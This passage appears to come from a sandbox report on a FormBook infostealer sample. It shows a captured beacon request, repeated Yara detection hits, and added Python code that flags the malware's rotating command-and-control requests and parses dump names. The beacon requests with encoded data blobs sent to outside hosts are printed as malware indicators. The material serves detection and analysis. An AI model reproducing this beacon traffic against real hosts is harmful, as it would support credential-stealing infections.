              GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1
              Host: www.diofis.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii: (seven null bytes, nothing printable)
          Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
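The three GET requests above share one path (/rigx/) and one pair of query parameter names (8pr and 1btd7D) while the Host changes on every request. That shape, not the individual domain, is what to detect: FormBook walks a list of domains from its configuration, and a host on that list is a weak indicator on its own. The www.diofis.com WordPress markup found in cmmon32.exe memory above is consistent with the injected process having fetched that site's real front page, so the domain is not necessarily attacker-controlled. The following Python is an added example, not part of the Joe Sandbox report or of any vendor tooling: it reassembles the report's request records as raw HTTP/1.1 requests (constructed here from the lines above, with the seven null bytes of "Data Raw" as the body and one benign control request added), parses them without URL-decoding the query, scores each against the beacon shape (GET, no User-Agent, short single-segment directory, exactly two parameters of which one is a short token and one a long base64-alphabet blob, null-byte body), and reports path-plus-parameter-name signatures that were sent to more than one Host. The thresholds (8-character token, 40-character blob, 2 to 8 character directory name) are this example's assumptions tuned to the three requests above, not FormBook constants.

```python
import re
from collections import defaultdict

# Constructed input: the three GET requests this report lists, reassembled as
# raw HTTP/1.1 requests (the report prints the headers run together and the
# seven-null-byte body as "Data Raw"), plus one benign request as a control.
RAW_REQUESTS = [
    "GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1\r\n"
    "Host: www.lifeinformpodcast.com\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    "GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1\r\n"
    "Host: www.transforming-leadership.com\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    "GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1\r\n"
    "Host: www.diofis.com\r\nConnection: close\r\n\r\n" + "\x00" * 7,
    # Control request (constructed): an ordinary browser fetch that must not be flagged.
    "GET /blog/?s=salata HTTP/1.1\r\nHost: www.diofis.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

# Thresholds are assumptions of this example, tuned to the requests above.
SHORT_TOKEN = re.compile(r"[A-Za-z0-9]{1,8}")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
CAMPAIGN_PATH = re.compile(r"/[A-Za-z0-9]{2,8}/")


def parse_request(raw):
    """Split a raw HTTP request into method, path, query parameters, headers and
    body. The query is deliberately not URL-decoded: '+' and '/' in the long
    parameter are base64 alphabet, and decoding would turn '+' into a space."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = {}
    for part in (query.split("&") if query else []):
        key, _, value = part.partition("=")
        params[key] = value
    return {"method": method, "path": path, "params": params,
            "host": headers.get("host", ""), "headers": headers, "body": body}


def looks_like_beacon(req):
    """Shape of the GET beacons in this report: a short directory-style path,
    exactly two query parameters (one short token, one long base64-like blob),
    no User-Agent header and a body consisting only of null bytes."""
    if req["method"] != "GET" or "user-agent" in req["headers"]:
        return False
    if not CAMPAIGN_PATH.fullmatch(req["path"]) or len(req["params"]) != 2:
        return False
    values = list(req["params"].values())
    short = [v for v in values if SHORT_TOKEN.fullmatch(v)]
    blob = [v for v in values if B64_BLOB.fullmatch(v)]
    null_body = bool(req["body"]) and set(req["body"]) == {"\x00"}
    return len(short) == 1 and len(blob) == 1 and null_body


def rotating_beacons(raw_requests, min_hosts=2):
    """Group beacon-shaped requests by (path, sorted parameter names) and return
    the groups that were sent to at least `min_hosts` distinct Host values: the
    same URI template against unrelated hosts is the rotation signal."""
    groups = defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        if looks_like_beacon(req):
            groups[(req["path"], tuple(sorted(req["params"])))].add(req["host"])
    return {sig: sorted(hosts) for sig, hosts in groups.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for (path, keys), hosts in rotating_beacons(RAW_REQUESTS).items():
        print(path, keys, "->", ", ".join(hosts))
```

Run as-is it prints the single signature /rigx/ with keys (1btd7D, 8pr) against all three hosts; the control request, which hits the same domain with a User-Agent and no null-byte body, is not grouped. In production the same grouping over proxy logs is what separates a rotation through decoy domains from three unrelated visits.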

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: MAPO-PI.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
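The memory-dump and unpacked-PE names that the Yara hits point at, both in the "Yara detected FormBook" list under E-Banking Fraud and in the rule matches here, encode which process and which region each match came from, and reading them is the fastest way to see where the payload actually lives. The following Python is an added example, not Joe Sandbox or any vendor code: it parses both name forms and summarises, per process, the base addresses Yara fired on and which of them were dumped with an executable-and-writable protection, the state an unpacked or injected payload sits in. The field layout it assumes is: for .sdmp names, process index (hex), snapshot, dump counter, base address, page protection and a trailing field it ignores; for .unpack names, process index (decimal), snapshot, image name, base address, index. The protection values are the Win32 PAGE_* constants (0x40 PAGE_EXECUTE_READWRITE, 0x04 PAGE_READWRITE). Process 16 is named from the cmmon32.exe entries earlier in this report; process 4 is left unnamed because nothing in this section identifies it. The input list is the report's own source names, copied verbatim.

```python
import re
from collections import defaultdict

# Input: the Yara hit sources listed in this report, verbatim.
YARA_HITS = [
    "3.0.MAPO-PI.exe.400000.8.unpack",
    "3.0.MAPO-PI.exe.400000.6.raw.unpack",
    "3.2.MAPO-PI.exe.400000.0.unpack",
    "3.0.MAPO-PI.exe.400000.6.unpack",
    "3.2.MAPO-PI.exe.400000.0.raw.unpack",
    "3.0.MAPO-PI.exe.400000.8.raw.unpack",
    "3.0.MAPO-PI.exe.400000.4.unpack",
    "0.2.MAPO-PI.exe.3734c80.2.raw.unpack",
    "0.2.MAPO-PI.exe.36e6660.3.raw.unpack",
    "00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp",
    "00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp",
    "00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp",
    "00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp",
    "00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp",
    "00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp",
    "00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp",
    "00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp",
    "00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp",
    "00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp",
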